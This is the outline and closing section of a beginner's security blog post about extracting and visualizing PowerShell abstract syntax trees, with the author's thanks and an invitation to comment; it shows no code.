    1. Concept
    2. Access to AST
  • 3. Visualization of abstract syntax tree
    1. Official example
    2. AST extraction of code block
    3. AST extraction of specified PS file
  • 4. Abstract syntax tree node extraction
    1. Extract AST nodes
    2. AST node splicing
    3. Loop read PS and extract AST
  • 5. ParseInput replaces Create
  • 6. Summary

To the readers who have made it this far, my sincere thanks. As one more bonus, the author recommends three treasure-trove PowerShell websites.

If this article has shortcomings, please forgive them. This is the author's slow path of growth as a network security beginner, and I hope to write more articles on the topic in the future. I am also very grateful to the security experts in the references for sharing their articles. I know I am still a novice and have to work hard to move forward.

Everyone is welcome to join the discussion. Has this series helped you? Any suggestions can be left in the comments, and let's encourage each other.
